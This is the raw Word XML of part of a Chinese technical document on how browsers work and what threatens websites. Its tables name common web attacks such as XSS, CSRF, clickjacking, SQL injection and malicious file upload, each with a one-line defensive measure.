        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50ECBA46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执行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JavaScript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代码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(V8/SpiderMonkey)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="411407E3" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01A86B57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网络模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="352AABF8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HTTP/FTP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等网络请求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(Chromium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使用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Cronet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4E767739" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="387F56AF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数据存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="082D5730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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Cookie/IndexedDB/LocalStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31C894AF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FCC248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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键路径优化：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B633A6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优化</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：减少选择器复杂度，避免阻塞渲染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE84BEF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步加载：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script async&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script defer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5E77E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源预加载：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;link rel="preload"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447E942E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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>现代浏览器特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47078685" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渐进式渲染：分块显示已下载内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C0860B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合成层加速：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渲染</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动画</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E312CA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Service Worker</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：离线缓存支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C548B19" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网站安全威胁全景图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269355E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk199703461"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端威胁</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29313795" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>网站安全之</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>客户端威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563"/>
        <w:gridCol w:w="2970"/>
        <w:gridCol w:w="3311"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="299D20B9" w14:textId="77777777" w:rsidTr="00501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02E2033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威胁类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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49632E5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原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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12B6A62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防护措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="658059F3" w14:textId="77777777" w:rsidTr="00501C99"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14:paraId="0BFD1B13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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>XSS(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>跨站脚本</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="08044E6B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rFonts w:cs="Times New Roman"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恶意脚本注入页面执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1873" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28412049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输入过滤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/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输出编码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/CSP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策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="16DDEA00" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0807996B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rFonts w:cs="Times New Roman"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CSRF(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跨站请求伪造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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2695650E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rFonts w:cs="Times New Roman"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诱导用户发起非预期操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1873" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C5292FE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Anti-CSRF Token/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同源检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="640EB28F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A66BFAA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点击劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32D3C968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透明层覆盖诱导点击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1873" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01E25CCC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X-Frame-Options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响应头</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5C229063" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="22E4F77D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中间人攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44F7313B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拦截通信数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1873" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A286E76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HTTPS/HSTS/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证书锁定</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="350A18E8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6A482F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服务端威胁：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B600CFE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>网站安全之</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务器威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10"/>
        <w:gridCol w:w="3410"/>
        <w:gridCol w:w="3324"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="17D796DA" w14:textId="77777777" w:rsidTr="00501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EDF1E8C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威胁类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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0A3DC7E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原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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94E9C86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防护措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1CDBBF34" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44C2D853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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01F1CBA9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rFonts w:cs="Times New Roman"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恶意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SQL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篡改数据库查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="341ECE43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参数化查询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/ORM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框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="74FC5C39" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3542F6B9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rFonts w:cs="Times New Roman"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文件上传漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64FFDFF6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rFonts w:cs="Times New Roman"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上传恶意文件获取控制权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="473FC884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文件类型校验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/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隔离存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="296C2F5A" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
